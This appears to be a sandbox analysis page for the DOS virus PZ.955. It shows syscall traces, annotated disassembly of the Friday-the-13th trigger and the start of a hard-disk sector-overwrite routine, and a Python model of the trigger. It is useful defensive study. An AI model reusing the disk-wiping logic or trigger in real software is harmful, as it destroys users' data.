Sample viewer

vx.netlux.org/Virus.DOS.PZ.955

[GIF image not reproduced]

Syscalls:

Time  Op(AH)  PC  | Syscall name
2018-12-17T22:31:08.501773435Z 98 PC: 16a09 | Get current PSP
2018-12-17T22:31:08.503742597Z 53 PC: 16a1c | Get interrupt vector (Interrupt = 0x21, the DOS services vector; the viewer's 'Random read' label is the name of DOS function 21h, not of the interrupt)
2018-12-17T22:31:08.505651548Z 37 PC: 16a58 | Set interrupt vector (Interrupt = 0x21, DOS services: the sample installs its own INT 21h handler)
2018-12-17T22:31:08.508164287Z 42 PC: 16871 | Get date

Disassembly at the return address of the Get date call (INT 21h/AH=2Ah returns AL = day of week, 0 = Sunday, and DL = day of month):

0x16871: cmp al, 5                          ; 5 = Friday
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd                        ; 0xd = the 13th
0x16878: jne 0x1687d
0x1687a: call 0x1687e                       ; Friday the 13th: run the payload
0x1687d: ret
0x1687e: mov ah, 8                          ; INT 13h/AH=08h: get drive parameters
0x16880: mov dl, 0x80                       ; DL = 0x80, first hard disk
0x16882: int 0x13
0x16884: mov ax, cx                         ; CX = cylinder/sectors-per-track fields
0x16886: mov cl, 0xa
0x16888: shr ax, cl                         ; AX = CX >> 10
0x1688a: mov byte ptr cs:[bp + 0x235], al   ; store it in a BP-relative variable
0x1688f: xor ch, ch
0x16891: mov cl, dh                         ; DH = highest head number
0x16893: inc cl                             ; CL = number of heads
0x16895: push cx
0x16896: mov ah, 3                          ; INT 13h/AH=03h: write sectors
0x16898: mov dl, 0x80                       ; to the first hard disk; the viewer's disassembly ends before the INT 13h
0x1689a: mov dh, cl

2018-12-17T22:31:08.519672204Z 99 PC: 15209 | Get DBCS lead byte table pointer
2018-12-17T22:31:08.522352761Z 68 PC: 15223 | I/O control for devices (Set for = '')
2018-12-17T22:31:08.524294846Z 68 PC: 1522e | I/O control for devices (Set for = '')
2018-12-17T22:31:08.526498745Z 68 PC: 15239 | I/O control for devices (Set for = '')
2018-12-17T22:31:08.529427516Z 68 PC: 15241 | I/O control for devices (Set for = '<non-printable bytes>')
2018-12-17T22:31:08.531274497Z 48 PC: 15246 | Get DOS version
2018-12-17T22:31:08.533102308Z 64 PC: 1537b | Write file or device (Write 23 bytes on handle 2)
2018-12-17T22:31:08.539211551Z 76 PC: 12b6b | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

[GIF image not reproduced]

Syscalls:

Time  Op(AH)  PC  | Syscall name
2018-12-25T11:54:50.741969631Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:50.743387944Z 53 PC: 16a1c | Get interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:50.74484559Z 37 PC: 16a58 | Set interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:50.746159142Z 42 PC: 16871 | Get date

Disassembly at the return address 0x16871 of the Get date call:

0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl

2018-12-25T11:54:50.758065969Z 99 PC: 15209 | Get DBCS lead byte table pointer
2018-12-25T11:54:50.760518887Z 68 PC: 15223 | I/O control for devices (Set for = '')
2018-12-25T11:54:50.762408966Z 68 PC: 1522e | I/O control for devices (Set for = '')
2018-12-25T11:54:50.764579852Z 68 PC: 15239 | I/O control for devices (Set for = '')
2018-12-25T11:54:50.767413503Z 68 PC: 15241 | I/O control for devices (Set for = '<non-printable bytes>')
2018-12-25T11:54:50.769319125Z 48 PC: 15246 | Get DOS version
2018-12-25T11:54:50.771191356Z 64 PC: 1537b | Write file or device (Write 23 bytes on handle 2)
2018-12-25T11:54:50.780336083Z 76 PC: 12b6b | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

[GIF image not reproduced]

Syscalls:

Time  Op(AH)  PC  | Syscall name
2018-12-25T11:54:51.145887361Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:51.146943537Z 53 PC: 16a1c | Get interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:51.148113864Z 37 PC: 16a58 | Set interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:51.149145177Z 42 PC: 16871 | Get date

Disassembly at the return address 0x16871 of the Get date call:

0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl

2018-12-25T11:54:51.158985735Z 99 PC: 15209 | Get DBCS lead byte table pointer
2018-12-25T11:54:51.160441229Z 68 PC: 15223 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.162051281Z 68 PC: 1522e | I/O control for devices (Set for = '')
2018-12-25T11:54:51.164684473Z 68 PC: 15239 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.166156128Z 68 PC: 15241 | I/O control for devices (Set for = '<non-printable bytes>')
2018-12-25T11:54:51.167844418Z 48 PC: 15246 | Get DOS version
2018-12-25T11:54:51.16992179Z 64 PC: 1537b | Write file or device (Write 23 bytes on handle 2)
2018-12-25T11:54:51.174760302Z 76 PC: 12b6b | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

[GIF image not reproduced]

Syscalls:

Time  Op(AH)  PC  | Syscall name
2018-12-25T11:54:51.331717198Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:51.332802356Z 53 PC: 16a1c | Get interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:51.333899588Z 37 PC: 16a58 | Set interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:51.3349317Z 42 PC: 16871 | Get date

Disassembly at the return address 0x16871 of the Get date call:

0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl

(No further syscalls were recorded in this run.)

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

[GIF image not reproduced]

Syscalls:

Time  Op(AH)  PC  | Syscall name
2018-12-25T11:54:51.605595212Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:51.60704646Z 53 PC: 16a1c | Get interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:51.608537752Z 37 PC: 16a58 | Set interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:51.609893706Z 42 PC: 16871 | Get date

Disassembly at the return address 0x16871 of the Get date call:

0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl

2018-12-25T11:54:51.619409598Z 99 PC: 15209 | Get DBCS lead byte table pointer
2018-12-25T11:54:51.621012326Z 68 PC: 15223 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.622318731Z 68 PC: 1522e | I/O control for devices (Set for = '')
2018-12-25T11:54:51.623721828Z 68 PC: 15239 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.625353254Z 68 PC: 15241 | I/O control for devices (Set for = '<non-printable bytes>')
2018-12-25T11:54:51.626874372Z 48 PC: 15246 | Get DOS version
2018-12-25T11:54:51.628222594Z 64 PC: 1537b | Write file or device (Write 23 bytes on handle 2)
2018-12-25T11:54:51.632949865Z 76 PC: 12b6b | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

[GIF image not reproduced]

Syscalls:

Time  Op(AH)  PC  | Syscall name
2018-12-25T11:54:51.902234122Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:51.904354638Z 53 PC: 16a1c | Get interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:51.906076815Z 37 PC: 16a58 | Set interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:51.907493462Z 42 PC: 16871 | Get date

Disassembly at the return address 0x16871 of the Get date call:

0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl

(No further syscalls were recorded in this run.)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

[GIF image not reproduced]

Syscalls:

Time  Op(AH)  PC  | Syscall name
2018-12-25T11:54:51.96185364Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:51.963145295Z 53 PC: 16a1c | Get interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:51.964443481Z 37 PC: 16a58 | Set interrupt vector (Interrupt = 0x21, DOS services)
2018-12-25T11:54:51.965588654Z 42 PC: 16871 | Get date

Disassembly at the return address 0x16871 of the Get date call:

0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl

2018-12-25T11:54:51.975297899Z 99 PC: 15209 | Get DBCS lead byte table pointer
2018-12-25T11:54:51.976418496Z 68 PC: 15223 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.97765918Z 68 PC: 1522e | I/O control for devices (Set for = '')
2018-12-25T11:54:51.979708333Z 68 PC: 15239 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.980974343Z 68 PC: 15241 | I/O control for devices (Set for = '<non-printable bytes>')
2018-12-25T11:54:51.982509197Z 48 PC: 15246 | Get DOS version
2018-12-25T11:54:51.984848798Z 64 PC: 1537b | Write file or device (Write 23 bytes on handle 2)
2018-12-25T11:54:51.990111092Z 76 PC: 12b6b | Terminate with return code (Return code = '0')
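The disassembly shown after every Get date call above is the same code: it compares AL (day of week from INT 21h/AH=2Ah) with 5 and DL (day of month) with 0xd, and only then calls the routine that queries the first hard disk's geometry with INT 13h/AH=08h and prepares an INT 13h/AH=03h sector write. The Python below is an added example, not code from the sample or from the viewer: it models that register-level check, sweeps a year of dates through it the way the viewer's DateBased side jobs do, evaluates the three side-job records copied from the JSON above, and decodes the AH=08h geometry registers into the values the code at 0x16884..0x16893 derives. All function names are my own, and the geometry passed in at the end is a constructed value.

```python
"""Model of the Friday-the-13th trigger and the INT 13h/AH=08h geometry decoding
seen in the disassembly after the Get date call (added example, not the sample's
or the viewer's code; function names are assumptions)."""
import datetime as dt
import json


def dos_get_date(year: int, month: int, day: int) -> dict:
    """Registers INT 21h/AH=2Ah returns for a calendar date:
    AL = day of week (0 = Sunday ... 6 = Saturday), CX = year, DH = month, DL = day."""
    d = dt.date(year, month, day)
    return {"al": (d.weekday() + 1) % 7,   # Python counts Monday = 0, DOS counts Sunday = 0
            "cx": year, "dh": month, "dl": day}


def payload_triggers(year: int, month: int, day: int) -> bool:
    """The check at 0x16871..0x1687a: cmp al,5 / jne ; cmp dl,0xd / jne ; call payload.
    True only when the date is a Friday (AL == 5) and the 13th (DL == 0x0d)."""
    r = dos_get_date(year, month, day)
    return r["al"] == 5 and r["dl"] == 0x0D


def trigger_dates(year: int) -> list:
    """Sweep every day of one year through the trigger check, the way the viewer's
    DateBased side jobs probe the sample, and return the (month, day) pairs that fire."""
    d = dt.date(year, 1, 1)
    hits = []
    while d.year == year:
        if payload_triggers(d.year, d.month, d.day):
            hits.append((d.month, d.day))
        d += dt.timedelta(days=1)
    return hits


# The three distinct DateBased side-job records shown on this page.
SIDE_JOBS = [json.loads(s) for s in (
    '{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}',
    '{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}',
    '{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}',
)]


def jobs_that_trigger(jobs: list) -> list:
    """Evaluate side-job dates against the trigger; returns (year, month, day) of the hits."""
    return [(j["Year"], j["Month"], j["Day"]) for j in jobs
            if j.get("DateBased") and payload_triggers(j["Year"], j["Month"], j["Day"])]


def decode_int13_ah08(cx: int, dx: int) -> dict:
    """Decode the geometry INT 13h/AH=08h returns (CH = low 8 bits of the highest
    cylinder number, CL bits 7..6 = its high 2 bits, CL bits 5..0 = sectors per track,
    DH = highest head number) plus the two values the code at 0x16884..0x16893
    derives from those registers before setting up the AH=03h write."""
    ch, cl, dh = (cx >> 8) & 0xFF, cx & 0xFF, (dx >> 8) & 0xFF
    return {
        "max_cylinder": ((cl & 0xC0) << 2) | ch,
        "sectors_per_track": cl & 0x3F,
        "max_head": dh,
        "byte_at_bp_0x235": (cx >> 10) & 0xFF,   # mov ax,cx ; mov cl,0xa ; shr ax,cl ; store AL
        "cl_head_count": (dh + 1) & 0xFF,        # xor ch,ch ; mov cl,dh ; inc cl
    }


if __name__ == "__main__":
    for j in SIDE_JOBS:
        fires = payload_triggers(j["Year"], j["Month"], j["Day"])
        print(j["Year"], j["Month"], j["Day"], "->", "payload runs" if fires else "dormant")
    print("trigger dates in 1980:", trigger_dates(1980))
    # Constructed geometry: highest cylinder 1023, 16 heads, 63 sectors/track, drive 0x80.
    print(decode_int13_ah08(cx=0xFFFF, dx=0x0F80))
```

Of the three side-job dates, only 1980-06-13 satisfies both comparisons: 1980-01-01 is a Tuesday and 1980-01-04 is a Friday but not the 13th. Sweeping the whole year finds no other Friday the 13th in 1980, which is why a date-based sandbox run needs a calendar sweep rather than a single guessed date to reach this code path.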